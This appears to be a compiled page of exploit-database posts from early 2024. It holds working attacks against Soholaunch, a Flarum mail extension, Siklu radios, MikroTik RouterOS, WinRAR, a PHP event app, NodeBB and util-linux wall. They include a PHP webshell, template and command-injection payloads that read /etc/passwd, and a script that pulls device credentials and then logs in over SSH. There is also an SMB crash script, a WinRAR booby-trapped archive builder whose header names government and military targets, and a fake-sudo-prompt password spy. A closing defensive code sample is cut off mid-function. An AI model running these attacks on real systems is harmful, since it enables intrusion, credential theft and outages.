<pre><code>## Exploit Title: Soholaunch Version : v4.9.4 r44 Remote Code Execution<br />### Date: 2024-3-29<br />### Exploit Author: tmrswrr<br />### Category: Webapps<br />### Vendor Homepage: https://livesite.com/<br />### Version : v4.9.4 r44<br /><br /><br />1 ) Log in with admin credentials, click Main Menu > File Manager > Upload New Files, and upload a test.php file<br /><br />Payload : <?php echo system('id'); ?><br /><br />2 ) Then click File Manager > Images > test.php : https://127.0.0.1/Soholaunch/images/test.php<br /><br />Result: uid=1000(soho) gid=1000(soho) groups=1000(soho) uid=1000(soho) gid=1000(soho) groups=1000(soho)<br /></code></pre>
<pre><code>Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Local File<br />Inclusion (LFI)<br />Date: 03/28/2024<br />Exploit Author: Chokri Hammedi<br />Vendor Homepage: https://flarum.org/<br />Software Link: https://github.com/FriendsOfFlarum/pretty-mail<br />Version: 1.1.2<br />Tested on: Windows XP<br />CVE: N/A<br />Description:<br /><br />The FoF Pretty Mail extension for Flarum is vulnerable to Local File<br />Inclusion (LFI) due to the unsafe handling of file paths in the email<br />template. An attacker with administrative access can exploit this<br />vulnerability to include sensitive files from the server's file system in<br />the email content, potentially leading to information disclosure.<br /><br />Steps to Reproduce:<br /><br />Log in as an administrator on the Flarum forum.<br /><br />Navigate to the FoF Pretty Mail extension settings.<br /><br />Edit the email default template and insert the following payload at the end<br />of the template:<br /><br />{{ include('/etc/passwd') }}<br /><br />Save the changes to the email template.<br /><br />Trigger any action that sends an email, such as user registration or<br />password reset.<br /><br />The recipient of the email will see the contents of the included file (in<br />this case, /etc/passwd) in the email content.<br /></code></pre>
<pre><code>Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Server-Side<br />Template Injection (SSTI)<br />Date: 03/28/2024<br />Exploit Author: Chokri Hammedi<br />Vendor Homepage: https://flarum.org/<br />Software Link: https://github.com/FriendsOfFlarum/pretty-mail<br />Version: 1.1.2<br />Tested on: Windows XP<br />CVE: N/A<br />Description:<br /><br />The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side<br />Template Injection (SSTI) due to the unsafe handling of template variables.<br />An attacker with administrative access can inject malicious code into the<br />email template, leading to arbitrary code execution on the server.<br /><br />Steps to Reproduce:<br /><br />Log in as an administrator on the Flarum forum.<br />Navigate to the FoF Pretty Mail extension settings.<br />Edit the email default template and insert the following payload:<br /><br /><br /><br />{{ 7*7 }}<br />{{ system('id') }}<br />{{ system('echo "Take The Rose"') }}<br /><br />Save the changes to the email template.<br />Trigger any action that sends an email, such as user registration or<br />password reset.<br />The recipient of the email will see the result of the injected expressions<br />(e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id')<br />}}, and the output of the echo "Take The Rose" command for {{ system('echo<br />"Take The Rose"') }}) in the email content.<br /></code></pre>
<pre><code>Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Command Injection<br />Date: 03/28/2024<br />Exploit Author: Chokri Hammedi<br />Vendor Homepage: https://flarum.org/<br />Software Link: https://github.com/FriendsOfFlarum/pretty-mail<br />Version: 1.1.2<br />Tested on: Windows XP<br />CVE: N/A<br />Description:<br /><br />The FoF Pretty Mail extension for Flarum is vulnerable to Command Injection<br />due to the unsafe handling of user input in the email template. An attacker<br />with administrative access can inject PHP code into the email template,<br />leading to arbitrary command execution on the server.<br /><br />Steps to Reproduce:<br /><br />Log in as an administrator on the Flarum forum.<br />Navigate to the FoF Pretty Mail extension settings.<br />Edit the email default template and insert one of the following payloads at<br />the end of the template:<br /><br /><?php system('echo "Take The Rose"; id'); ?><br />or<br /><?php system('echo "Take The Rose"; cat /etc/passwd'); ?><br /><br />Save the changes to the email template.<br />Trigger any action that sends an email, such as user registration or<br />password reset.<br />The recipient of the email will see the message "Take The Rose" followed by<br />the output of the injected command (id or cat /etc/passwd) in the email<br />content.<br /></code></pre>
<pre><code># Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure<br /># Date: 28-02-2024<br /># Exploit Author: semaja2<br /># Vendor Homepage: https://siklu.com/<br /># Software Link: https://partners.siklu.com/home/frontdoor<br /># Version: < 2.0.0<br /># Tested on: 2.0.0<br /># CVE : None assigned<br />#<br /># Instructions<br /># 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device<br /># `ping6 -I en7 -c 2 ff02::1`<br /># 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address<br /># `ip -6 neigh show dev en7`<br /># 3. Execute script<br /># `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`<br /># 4. Enjoy the access<br /><br /><br /><br />import socket<br />import sys<br />import os<br /><br />address = str(sys.argv[1]) # the target<br />port = 12777<br /><br /># Captured command, sends "GetCredentials" to obtain random generated username/password<br />cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")<br /><br />addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)<br />(family, socktype, proto, canonname, sockaddr) = addrinfo[0]<br />s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)<br />s.connect(sockaddr)<br />s.send(cmd)<br />data = s.recv(200)<br />s.close()<br />output = "".join(map(chr, data))<br /><br /># Split output, then remove trailing noise as string length is always 35<br />splits = output.split('#')<br />username = splits[1][slice(0, 35, 1)]<br />password = splits[2][slice(0, 35, 1)]<br />print('Username: ', username)<br />print('Password: ', password)<br />os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS<br /># Google Dork: N/A<br /># Date: 03/04/2024<br /># Exploit Author: ice-wzl, Solstice Cyber Solutions<br /># Vendor Homepage: https://mikrotik.com/<br /># Software Link: https://mikrotik.com/download/archive<br /># Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10<br /># Tested on: RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10<br /># CVE : CVE-2024-27686<br />#!/usr/bin/python3 <br /># Founded by ice-wzl in conjunction with Solstice Cyber Solutions<br />import argparse<br />import sys<br />import socket <br /># Define the packets<br /><br /># the packet that causes crash 6.40.5 - 6.42.3<br />fuzzed_packet_6 = b'\x00\x00\x00n\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x03\x00\xf1\x1f\x08\x00\x00\x00\x00\x00\x00\xe1\xbe\x82\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00G\xe5\x07\xf5\x07\xec\x01u\xe4Q]\x9e\xea\xedn\xa9\t\x00\x00\x00H\x00&\x00\\\x00\\\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x007\x007\x00\\\x00p\x00u\x00b\x00'<br /><br /><br />packet_0 = b'\x00\x00\x00\xea\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00\xe8\xe4*\x99\xc9\xeb\xb6E\xa2A\xe9(\xee%\xe5\xdfp\x00\x00\x00\x04\x00\x00\x00\x02\x02\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00_\xf7m\xf2h*\x8f\x8ae\x0f8+T=Na8_\x0b@C\x82\xe7\x87\xc3qZ\xd7\xcf0M\x87\x00\x00\x02\x00\n\x00\x00\x00\x00\x00\x04\x00\x02\x00\x01\x00\x04\x00\x03\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x00\x00\x03\x00\x02\x00\x01\x00\x00\x00\x05\x00\x1a\x00\x00\x00\x00\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x008\x004\x00'<br />packet_2_fuzzed = 
b'\x00\x00\x00\xa2\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00X\x00J\x00\x00\x00\x00\x00\x00\x00\x00\x00`H\x05\x06+\x06\x01\x05\x05\x02\xa0>0<\xa0\x0e21540373\xed\xba\xad211\x0c\x06\n+\x06\x01\x04\x01\x82294517887446830\x02\x02\n\xa2*\x04(NTLMSSP\x00\x01\x00\x00\x00\x15\x82\x08b\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x06\x01\x00\x00\x00\x00\x00\x0f'<br /><br /><br />def open_connection(ip, port):<br />    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />    try:<br />        s.connect((ip, port))<br />        return s<br />    except ConnectionRefusedError:<br />        print(f"[!] Connection Refused on: {ip} {port}")<br />        sys.exit(2)<br /><br />def send_payload_high(s):<br />    s.send(packet_0)<br />    s.send(packet_2_fuzzed)<br />    s.close()<br /><br />def send_payload_low(s):<br />    s.send(fuzzed_packet_6)<br />    s.close()<br /><br />def verify_input(user_inp):<br />    try:<br />        user_inp = int(user_inp)<br />        if user_inp > 2 or user_inp < 1:<br />            return 3<br />        else:<br />            return user_inp<br />    except ValueError:<br />        return 0<br /><br />if __name__ == '__main__':<br /><br />    parser = argparse.ArgumentParser(prog='SMB Crash',<br />                                     description='Crashes Mikrotik RouterOS SMB Service 6.40.5 - 6.49.10',<br />                                     epilog='Discovered by: ice-wzl')<br /><br />    parser.add_argument("-t", "--target", action="store", dest="target")<br />    parser.add_argument("-p", "--port", action="store", dest="port")<br /><br />    args = parser.parse_args()<br /><br />    if not args.target or not args.port:<br />        print(f"[+] python3 {sys.argv[0]} --help")<br />        sys.exit(1)<br /><br />    print("[+] What version is the target:\n\t[1] 6.40.5 - 6.44\n\t[2] 6.48.1 - 6.49.10\nEnter 1 or 2:")<br />    version_choice = input("--> ")<br /><br />    if verify_input(version_choice) == 0:<br />        print("Please enter a number...")<br />        sys.exit(3)<br />    elif verify_input(version_choice) == 3:<br />        print("Please enter a number between 1 and 2")<br />        sys.exit(4)<br /><br />    if verify_input(version_choice) == 1:<br />        if args.port:<br />            get_connect = open_connection(args.target, int(args.port))<br />            send_payload_low(get_connect)<br />            print(f"[+] Sent DOS to {args.target} on {args.port}")<br />        else:<br />            get_connect = open_connection(args.target, 445)<br />            send_payload_low(get_connect)<br />            print(f"[+] Sent DOS to {args.target} on 445")<br /><br />    if verify_input(version_choice) == 2:<br />        if args.port:<br />            get_connect = open_connection(args.target, int(args.port))<br />            send_payload_high(get_connect)<br />            print(f"[+] Sent DOS to {args.target} on {args.port}")<br />        else:<br />            get_connect = open_connection(args.target, 445)<br />            send_payload_high(get_connect)<br />            print(f"[+] Sent DOS to {args.target} on 445")<br /><br /></code></pre>
<pre><code>Exploit Title: Broken Access Control - on NodeBB v3.6.7<br /><br />Date: 22/2/2024<br /><br />Exploit Author: Vibhor Sharma<br /><br />Vendor Homepage: https://nodebb.org/<br /><br />Version: 3.6.7<br /><br />Description:<br /><br />I identified a broken access control vulnerability in nodeBB v3.6.7,<br />enabling attackers to access restricted information intended solely<br />for administrators. Specifically, this data is accessible only to<br />admins and not regular users. Through testing, I discovered that when<br />a user accesses the group section of the application and intercepts<br />the response for the corresponding request, certain attributes are<br />provided in the JSON response. By manipulating these attributes, a<br />user can gain access to tabs restricted to administrators. Upon<br />reporting this issue, it was duly acknowledged and promptly resolved<br />by the developers.<br /><br /><br /><br />Steps To Reproduce:<br />1) A user with the least privileges needs to navigate to the group section.<br />2) Intercept the response for the group request.<br />3) In the response, modify the following parameters:<br />"system":0,"private":0,"isMember":true,"isPending":true,"isInvited":true,"isOwner":true,"isAdmin":true,<br />4) Forward the request and we can see that the attacker can access the<br />restricted information.<br /><br />Impact:<br />The attacker was able to access the restricted tabs for the Admin group<br />which are only allowed to the administrators.<br /><br /></code></pre>
<pre><code>################################################################################################<br /># Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 #<br /># #<br /># Author : E1.Coders #<br /># #<br /># Contact : E1.Coders [at] Mail [dot] RU #<br /># #<br /># Security Risk : High #<br /># #<br /># Description : All target's GOV & Military websites #<br /># #<br />################################################################################################<br /># #<br /># Expl0iTs: #<br /><br />#include <stdio.h><br />#include <stdlib.h><br />#include <string.h><br />#include "zip.h" /* minizip */<br /><br />#define PDF_FILE "document.pdf"<br />#define FOLDER_NAME "document.pdf\\"<br />#define SCRIPT_FILE "script.bat"<br />#define ZIP_FILE "exploit.zip"<br /><br />int main(void) {<br />    zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE);<br />    if (zf == NULL) {<br />        printf("Error opening ZIP file\n");<br />        return -1;<br />    }<br />    zip_fileinfo zfi;<br />    memset(&zfi, 0, sizeof(zfi));<br />    if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {<br />        printf("Error adding PDF file to ZIP file\n");<br />        zipClose(zf, NULL);<br />        return -1;<br />    }<br />    FILE *fp = fopen(PDF_FILE, "rb");<br />    if (fp == NULL) {<br />        printf("Error opening PDF file\n");<br />        zipCloseFileInZip(zf);<br />        zipClose(zf, NULL);<br />        return -1;<br />    }<br />    char buffer[1024];<br />    int bytes_read;<br />    while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) {<br />        if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) {<br />            printf("Error writing PDF file to ZIP file\n");<br />            fclose(fp);<br />            zipCloseFileInZip(zf);<br />            zipClose(zf, NULL);<br />            return -1;<br />        }<br />    }<br />    fclose(fp);<br />    zipCloseFileInZip(zf);<br />    if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {<br />        printf("Error adding folder to ZIP file\n");<br />        zipClose(zf, NULL);<br />        return -1;<br />    }<br />    zipCloseFileInZip(zf);<br />    char script_name[256];<br />    snprintf(script_name, sizeof(script_name), "%s%s", FOLDER_NAME, SCRIPT_FILE);<br />    if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {<br />        printf("Error adding script file to ZIP file\n");<br />        zipClose(zf, NULL);<br />        return -1;<br />    }<br />    char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n";<br />    if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) {<br />        printf("Error writing script file to ZIP file\n");<br />        zipCloseFileInZip(zf);<br />        zipClose(zf, NULL);<br />        return -1;<br />    }<br />    zipCloseFileInZip(zf);<br /><br />    zipClose(zf, NULL);<br /><br />    printf("ZIP file created successfully\n");<br />    return 0;<br />}<br /><br />https://nvd.nist.gov/vuln/detail/CVE-2023-38831<br />https://github.com/HDCE-inc/CVE-2023-38831<br />https://www.cvedetails.com/cve/CVE-2023-38831/<br />https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/<br />https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/CVE-2023-38831<br />http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html<br />https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/<br />https://news.ycombinator.com/item?id=37236100<br />https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/<br />https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/<br />https://hdce.medium.com/cve-2023-38831-winrar-zero-day-poses-new-risks-for-traders-684911befad2<br /></code></pre>
<pre><code># Exploit Title: Event Management - SQL Injection<br /># Application: Event Management<br /># Date: 19.02.2024<br /># Bugs: SQL Injection<br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://github.com/PuneethReddyHC<br /># Software Link: https://github.com/PuneethReddyHC/event-management<br /># Version: 1.0<br /># Attack Type: Remote<br /># Tested on: Windows 10 64 bit Wampserver<br /><br /><br /># About project:<br /><br />Helps to register users for events conducted in college fests, with simple logic and in a secure way.<br /><br /><br /><br />## Vulnerability Details:<br /><br />- **Application Name**: Event Management<br />- **Software Link**: [Download Link](https://github.com/PuneethReddyHC/event-management)<br />- **Vendor Homepage**: [Vendor Homepage](https://github.com/PuneethReddyHC)<br /><br /><br /><br /># Vulnerable code section:<br /><br /># https://github.com/PuneethReddyHC/event-management/blob/master/backend/register.php#L64<br /><br /><?php<br /><br />// ... (other code)<br /><br />if(empty($full_name) || empty($email) || empty($mobile)) {<br />    // Error messages and actions for incomplete data<br />} else {<br />    if(!preg_match($name,$full_name)){<br />        // Error messages and actions for invalid full name<br />    }<br /><br />    // Additional regex checks for email and mobile format<br /><br />    // Verifying mobile number length<br />    if(!(strlen($mobile) == 10)){<br />        // Error message and action for invalid mobile number length<br />    }<br /><br />    // Database insertion operation: request values are interpolated<br />    // straight into the query string<br />    $sql = "INSERT INTO `participants`<br />            (`p_id`,`event_id`, `fullname`, `email`,<br />             `mobile`, `college`, `branch`)<br />            VALUES (NULL,'$event_id', '$full_name', '$email',<br />                    '$mobile', '$college', '$branch')";<br /><br />    if(mysqli_query($con,$sql)){<br />        // Successful registration message<br />        echo "register_success";<br />        echo "<script> location.href='index.php'; </script>";<br />        exit;<br />    }<br />}<br /><br />// ... (other code)<br />?><br /><br /><br /><br /># Vulnerability Description:<br /><br />The code in register.php is vulnerable to SQL injection, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database. Additionally, the code lacks proper input validation and sanitization, leaving it open to other injection issues such as cross-site scripting (XSS).<br /><br /><br /><br /># Proof of Concept (PoC):<br /><br />SQL Injection:<br /><br />The vulnerability can be exploited by an attacker by manipulating the input parameters. For example, the event_id parameter is used directly in the SQL query without proper validation or parameterization.<br /><br />An attacker can manipulate the event_id parameter in the HTTP request to inject malicious SQL code.<br /><br />PoC:<br /><br />POST /event-management-master/backend/register.php HTTP/1.1<br />Host: localhost<br /><br />event_id=1'; DROP TABLE participants; --<br /><br />This could result in a SQL query like:<br /><br />INSERT INTO `participants` (`p_id`,`event_id`, `fullname`, `email`, `mobile`, `college`, `branch`)<br />VALUES (NULL,'1'; DROP TABLE participants; --', 'test', 'test@gmail.com', '0555555555', 'asd', 'qwe')<br /><br />To mitigate this, use prepared statements or parameterized queries so that user input is never interpreted as part of the SQL statement.<br /><br /></code></pre>
<pre><code>Wall-Escape (CVE-2024-28085)<br /><br />Skyler Ferrante: Escape sequence injection in util-linux wall<br /><br />=================================================================<br />Summary<br />=================================================================<br /><br />The util-linux wall command does not filter escape sequences from<br />command line arguments. The vulnerable code was introduced in<br />commit cdd3cc7fa4 (2013). Every version since has been<br />vulnerable.<br /><br />This allows unprivileged users to put arbitrary text on other<br />users' terminals, if mesg is set to y and wall is setgid. CentOS<br />is not vulnerable since wall is not setgid. On Ubuntu 22.04 and<br />Debian Bookworm, wall is setgid and mesg is set to y by<br />default.<br /><br />If a system runs a command when commands are not found, with the<br />unknown command as an argument, the unknown command will be<br />leaked. This is true of Ubuntu 22.04. Debian Bookworm does not<br />leak unknown commands in its starting configuration.<br /><br />On Ubuntu 22.04, we have enough control to leak a user's password<br />by default. The only indication of an attack to the user will be an<br />incorrect password prompt when they correctly type their<br />password, along with their password being in their command<br />history.<br /><br />On other systems that allow wall messages to be sent, an attacker<br />may be able to alter the clipboard of a victim. 
This works on<br />windows-terminal, but not on gnome-terminal.<br /><br />=================================================================<br />Analysis<br />=================================================================<br /><br />When displaying input from stdin, wall uses the function<br />fputs_careful in order to neutralize escape characters.<br /><br />Unfortunately, wall does not do the same for input coming from<br />argv.<br /><br />term-utils/wall.c (note that mvec is argv)<br />```<br />/*<br /> * Read message from argv[]<br /> */<br />int i;<br /><br />for (i = 0; i < mvecsz; i++) {<br />    fputs(mvec[i], fs);<br />    if (i < mvecsz - 1)<br />        fputc(' ', fs);<br />}<br />fputs("\r\n", fs);<br />...<br /><br />/*<br /> * Read message from stdin.<br /> */<br />while (getline(&lbuf, &lbuflen, stdin) >= 0)<br />    fputs_careful(lbuf, fs, '^', true, TERM_WIDTH);<br />```<br /><br />Since argv is attacker controlled, and can contain binary data,<br />this is exploitable. A simple PoC command:<br /><br />    wall $(printf "\033[33mHI")<br /><br />If you are vulnerable, this should show a broadcast with "HI"<br />being yellow. If we instead run:<br /><br />    echo $(printf "\033[33mHI") | wall<br /><br />This should fail, with "^[[33m" showing up before our message.<br /><br />To make sure the PoC will work, make sure your victim user can<br />actually receive messages. First check that mesg is set to y<br />(`mesg y`). If a user does not have mesg turned on, they are not<br />exploitable.<br /><br />If you still can't receive messages, try running `su user` or<br />accessing the machine through SSH. 
Note that just because you<br />can't receive messages without first going through su/SSH does<br />not mean a user is not vulnerable.<br /><br />=================================================================<br />Exploitation<br />=================================================================<br /><br />Most distros allow argument data to be seen by unprivileged<br />users, and some distros run commands when commands are not found.<br />We can use this to leak a user's password by tricking them into<br />giving their password as a command to run.<br /><br />When I run the command xsnow in my terminal, I get the following<br />output:<br />```<br />Command 'xsnow' not found, but can be installed with:<br />sudo apt install xsnow<br />```<br /><br />Let's look at what new processes are created when I do this:<br />```<br />-bash<br />/usr/bin/python3 /usr/lib/command-not-found -- xsnow<br />/usr/bin/snap advise-snap --format=json --command xsnow<br />```<br /><br />This is on Ubuntu, but similar commands exist on other systems.<br /><br />As a simple demonstration, let's create a fake sudo prompt for<br />gnome-terminal, and then spy on /proc/$pid/cmdline.<br /><br />fake sudo prompt:<br />```<br />#include<stdio.h><br />#include<unistd.h><br /><br />int main(){<br />    char* argv[] = {"prog",<br />                    "\033[3A"                    // Move up 3<br />                    "\033[K"                     // Delete prompt<br />                    "[sudo] password for a_user:"<br />                    "\033[?25l"                  // Hide cursor<br />                    // Set foreground RGB (48,10,36), the terminal<br />                    // background colour, to hide typing<br />                    "\033[38;2;48;10;36m",<br />                    NULL};<br /><br />    char* envp[] = {NULL};<br /><br />    execve("/usr/bin/wall", argv, envp);<br />    return 1; // only reached if execve fails<br />}<br />```<br /><br />cmdline spy:<br />```<br />#include<stdio.h><br />#include<sys/types.h><br />#include<sys/stat.h><br />#include<fcntl.h><br />#include<unistd.h><br />#include<ctype.h><br />#include<stdlib.h><br />#include<dirent.h><br />#include<time.h><br /><br />#define USLEEP_TIME 2000<br /><br />int main(){<br />    pid_t current_max_pid = 0, next_max_pid = 0;<br />    char current_file_name[BUFSIZ];<br />    char buf[BUFSIZ];<br /><br />    DIR* proc_dir;<br />    struct dirent *dir_e;<br />    int curr_e_fp;<br /><br />    while(1){<br />        proc_dir = opendir("/proc");<br />        if(!proc_dir)<br />            abort();<br /><br />        usleep(USLEEP_TIME);<br />        while((dir_e = readdir(proc_dir)) != NULL){<br />            char* d_name = dir_e->d_name;<br /><br />            // If not a digit (not a process folder)<br />            if(!isdigit(*d_name))<br />                continue;<br /><br />            int num = atoi(d_name);<br /><br />            // Only look at processes newer than the last sweep<br />            if(num > current_max_pid){<br />                next_max_pid = num;<br />            }else{<br />                continue;<br />            }<br /><br />            snprintf(current_file_name, sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");<br />            curr_e_fp = open(current_file_name, O_RDONLY);<br />            if(curr_e_fp < 0) // process already exited<br />                continue;<br />            int ra = read(curr_e_fp, buf, BUFSIZ-1);<br />            close(curr_e_fp);<br />            if(ra <= 0) // read error or empty cmdline (kernel thread)<br />                continue;<br /><br />            // cmdline is NUL separated; turn it into one line<br />            for(int i = 0; i<ra-1; i++)<br />                if(buf[i] == '\0') buf[i] = ' ';<br /><br />            // guaranteed to be in-bounds since ra >= 1<br />            buf[ra-1] = '\n';<br /><br />            write(1, buf, ra);<br />        }<br />        current_max_pid = next_max_pid;<br />        closedir(proc_dir);<br />    }<br />}<br />```<br /><br />If we run the cmdline spy and the sudo password prompt, the user<br />may input their password as a command. It will look like the<br />following on Ubuntu:<br /><br />```<br />-bash<br />/usr/bin/python3 /usr/lib/command-not-found -- SuperSecretPassword!<br />/usr/bin/snap advise-snap --format=json --command SuperSecretPassword!<br />```<br /><br />Some distros, like Debian, do not seem to have a command like<br />command-not-found by default. There does not seem to be a way to<br />leak a user's password in this case, even though we can send<br />escape sequences to them.<br /><br />This works, but the user has no reason to expect a password prompt<br />at this point. 
Now that we have shown some exploitability, let's<br />try to make it better.<br /><br />Imagine we run the cmdline spy in one terminal, and then in<br />another terminal we run `sudo systemctl status cron.service`.<br />The spy will see the sudo process first, and then, after the user<br />types their password correctly, it will see `systemctl status<br />cron.service`.<br /><br />```<br />sudo systemctl status cron.service<br />systemctl status cron.service<br />```<br /><br />An attacker could inject a "password incorrect" message as soon as<br />the second process starts (password correct). The user will<br />assume they typed their password incorrectly and enter it again.<br /><br />Watch for a certain command:<br />```<br />#include<stdio.h><br />#include<sys/types.h><br />#include<sys/stat.h><br />#include<fcntl.h><br />#include<unistd.h><br />#include<ctype.h><br />#include<stdlib.h><br />#include<dirent.h><br />#include<time.h><br />#include<string.h><br /><br />#define USLEEP_TIME 3000<br /><br />int main(int argc, char** argv){<br />    char current_file_name[BUFSIZ];<br />    char buf[BUFSIZ];<br /><br />    DIR* proc_dir;<br />    struct dirent *dir_e;<br />    int curr_e_fp;<br /><br />    if(argc != 2){<br />        printf("Usage: prog search_string\n");<br />        return 1;<br />    }<br /><br />    while(1){<br />        proc_dir = opendir("/proc");<br />        if(!proc_dir)<br />            abort();<br />        usleep(USLEEP_TIME);<br />        while((dir_e = readdir(proc_dir)) != NULL){<br />            char* d_name = dir_e->d_name;<br /><br />            // If not a digit (not a process folder)<br />            if(!isdigit(*d_name))<br />                continue;<br /><br />            snprintf(current_file_name, sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");<br />            curr_e_fp = open(current_file_name, O_RDONLY);<br />            if(curr_e_fp < 0) // process already exited<br />                continue;<br />            int ra = read(curr_e_fp, buf, BUFSIZ-1);<br />            close(curr_e_fp);<br />            if(ra <= 0) // read error or empty cmdline (kernel thread)<br />                continue;<br /><br />            // cmdline is NUL separated; turn it into one string<br />            for(int i = 0; i<ra-1; i++)<br />                if(buf[i] == '\0') buf[i] = ' ';<br /><br />            // guaranteed to be in-bounds since ra >= 1<br />            buf[ra-1] = '\0';<br /><br />            // Check if the process is us<br />            if(strstr(buf, argv[0])){<br />                continue;<br />            }<br />            // Check against search string<br />            if(!strcmp(buf, argv[1])){<br />                write(1, buf, ra);<br />                write(1, "\n", 1);<br />                closedir(proc_dir);<br />                return 0;<br />            }<br />        }<br />        closedir(proc_dir);<br />    }<br />}<br />```<br /><br />Imagine our new spy code was compiled as watch, and our wall<br />exploit was called throw.<br /><br />We can now run:<br />```<br />./watch "sudo systemctl start sshd"; ./watch "systemctl start sshd";<br />sleep .1; ./throw<br />```<br /><br />The first two commands will wait until the user runs<br /><br />    sudo systemctl start sshd<br /><br />and correctly types their password for sudo. Then our wall<br />exploit sends our fake sudo prompt. We need to sleep for a short<br />duration to make sure we cover up the command prompt.<br /><br />During this process, we need to make sure our original spy code<br />is logging all cmdline arguments, to recover the victim's password.<br /><br />Example log from original spy:<br />```<br />./watch sudo systemctl start sshd<br />sudo systemctl start sshd<br />./watch systemctl start sshd<br />systemctl start sshd<br />bash<br />./throw<br />bash<br />/usr/bin/python3 /usr/lib/command-not-found -- SuperStrongPassword<br />/usr/bin/snap advise-snap --format=json --command SuperStrongPassword<br />```<br /><br />Now let's imagine a different style of attack. An attacker can<br />change a user's clipboard through escape sequences on some<br />terminals. For example, windows-terminal supports this. 
gnome-terminal does not.<br /><br />```<br />#include<stdio.h><br /><br />int main(){<br />    // OSC 52: set the clipboard ("c") to the base64 payload<br />    printf("\033]52;c;QXR0YWNrZXIgbWVzc2FnZQo=\a");<br />}<br />```<br /><br />Since we can send escape sequences through wall, if a user is<br />using a terminal that supports this escape sequence, an attacker<br />can change the victim's clipboard to arbitrary text.<br /><br />Further references:<br />    https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt<br />    https://github.com/skyler-ferrante/CVE-2024-28085<br /><br /></code></pre>
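<p>The defensive counterpart to the Analysis section above, as an added example that is not part of the advisory or of util-linux: a simplified stand-in for fputs_careful() applied to the argv path, so that the \033[33m sequence from the PoC reaches a terminal as the harmless literal ^[[33m. The names copy_careful and build_message are mine, and unlike the real fputs_careful this version does no column-width handling.</p>

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Rewrite 'in' into 'out' (capacity outsz, always NUL-terminated) with every
 * byte below 0x20 and DEL (0x7f) shown in caret notation: ESC -> "^[",
 * DEL -> "^?". Bytes >= 0x80 (UTF-8) pass through untouched. Returns the
 * length the complete output needs, so a caller can detect truncation the
 * same way it would with snprintf(). */
size_t copy_careful(const char *in, char *out, size_t outsz)
{
    size_t need = 0;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        char tmp[2];
        size_t n;
        if (*p < 0x20 || *p == 0x7f) {
            tmp[0] = '^';
            tmp[1] = (char)(*p ^ 0x40);    /* control byte -> printable char */
            n = 2;
        } else {
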